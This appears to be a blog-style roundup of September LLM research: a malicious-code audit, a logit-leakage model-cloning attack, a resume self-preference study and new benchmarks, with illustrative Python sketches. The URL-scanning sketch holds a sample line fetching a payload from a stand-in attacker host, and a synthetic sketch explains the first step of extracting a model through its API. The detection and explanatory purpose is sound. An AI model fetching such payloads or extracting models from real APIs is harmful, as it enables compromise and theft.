September Research Blitz Reveals LLM Vulnerabilities and Rolls Out Real-World Benchmarks

New audits flag poisoning-driven malicious code generation alongside rapid black-box model cloning, sharpening the focus on deployable safeguards.

Overview

  • A scalable audit of GPT-4o, GPT-4o-mini, Llama-4-Scout, and DeepSeek-V3 found that an average of 4.2% of generated programs contained malicious URLs, with 177 benign prompts reliably triggering harmful code across all models (a sketch of this style of URL check appears after this list).
  • A logit‑leakage attack reconstructed a model's output projection from fewer than 10,000 top‑k queries and distilled functional clones in under 24 GPU hours without tripping API rate limits (the linear‑algebra idea behind the recovery is sketched below).
  • A large controlled hiring study found strong self‑preferencing: LLM evaluators favored resumes written by the same model, boosting shortlisting odds by 23%–60% over equally qualified human‑written resumes, with simple interventions halving the bias (the odds‑ratio metric behind those figures is sketched below).
  • New evaluation resources span deep research synthesis (InfoSeek), verifier‑reward reasoning datasets and generators (LoongBench/LoongEnv), Arabic and Islamic cultural competence (PalmX), Korean legal multi‑hop QA (KoBLEX), and rubric‑driven clinical behavior assessment (HealthBench).
  • Mitigation and efficiency tools reported concrete gains, including constitution‑aware decoding that reduced Indian caste‑ and religion‑based bias by up to 26.41% (AMBEDKAR), a cost‑guaranteed model cascade cutting spend by up to 86% (BARGAIN, whose cascade pattern is sketched below), and an attribution method auditing RAG reliance with over 95% accuracy (LEA).
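
Illustrative sketches

The audit in the first bullet counts generated programs that embed malicious URLs. As a minimal sketch of that style of check, assuming a local blocklist rather than whatever threat feed the authors used, the snippet below extracts URL hosts from generated code with a regex and intersects them with the blocklist; `scan_program` and the blocklist entries are illustrative, not the paper's actual pipeline.

```python
import re

# Illustrative blocklist; a real audit would use a maintained threat feed.
BLOCKLIST = {"evil.example.com", "malware.example.net"}

URL_RE = re.compile(r"https?://([^\s/'\"<>]+)")

def scan_program(source: str) -> list[str]:
    """Return the blocklisted hostnames found in one generated program."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(source)}
    return sorted(hosts & BLOCKLIST)

generated = 'resp = requests.get("http://evil.example.com/payload")'
print(scan_program(generated))  # ['evil.example.com']
```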
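
The logit‑leakage result builds on a linear‑algebra fact: every logit vector is a hidden state times the output projection, so logits gathered over many prompts span a subspace whose rank is at most the hidden width. The simulation below, a sketch with synthetic matrices rather than any real API, shows how SVD over stacked logit vectors exposes that width, the first step toward recovering the projection up to a linear transform.

```python
import numpy as np

rng = np.random.default_rng(0)
vocab, hidden, n_queries = 5000, 64, 200  # toy sizes, not a real model

W = rng.standard_normal((vocab, hidden))      # secret output projection
H = rng.standard_normal((n_queries, hidden))  # hidden states for n prompts
logits = H @ W.T                              # what top-k queries leak

# logits has rank <= hidden, so its singular values collapse past that point.
s = np.linalg.svd(logits, compute_uv=False)
est_hidden = int((s > s[0] * 1e-10).sum())
print(est_hidden)  # 64: the hidden width, recovered from logits alone
```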
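
The 23%–60% range in the hiring study describes boosts in shortlisting odds, not raw shortlisting rates. The helper below computes an odds ratio from shortlisting counts; the counts in the example are illustrative, not the study's data.

```python
def odds_ratio(hits_a: int, n_a: int, hits_b: int, n_b: int) -> float:
    """Odds of shortlisting in group A relative to group B."""
    return (hits_a / (n_a - hits_a)) / (hits_b / (n_b - hits_b))

# Illustrative counts: 60 of 100 same-model resumes shortlisted versus
# 50 of 100 human-written ones gives odds of 1.5 vs 1.0, a 50% boost.
print(odds_ratio(60, 100, 50, 100))  # 1.5
```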
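
BARGAIN's savings come from a cost‑guaranteed model cascade. The sketch below shows the generic pattern such systems refine: answer with a cheap model and escalate only when its confidence falls below a threshold. The model callables and the confidence signal are placeholders, and BARGAIN's statistical calibration of the threshold, which is what makes the cost guarantee hold, is omitted here.

```python
from typing import Callable, Tuple

def cascade(query: str,
            cheap: Callable[[str], Tuple[str, float]],
            strong: Callable[[str], str],
            threshold: float = 0.9) -> Tuple[str, str]:
    """Answer with the cheap model when confident; otherwise escalate."""
    answer, confidence = cheap(query)
    if confidence >= threshold:
        return answer, "cheap"
    return strong(query), "strong"

# Placeholder models standing in for real LLM calls.
cheap_llm = lambda q: ("42", 0.95 if "easy" in q else 0.4)
strong_llm = lambda q: "a carefully reasoned answer"

print(cascade("easy question", cheap_llm, strong_llm))  # ('42', 'cheap')
print(cascade("hard question", cheap_llm, strong_llm))  # escalates to strong
```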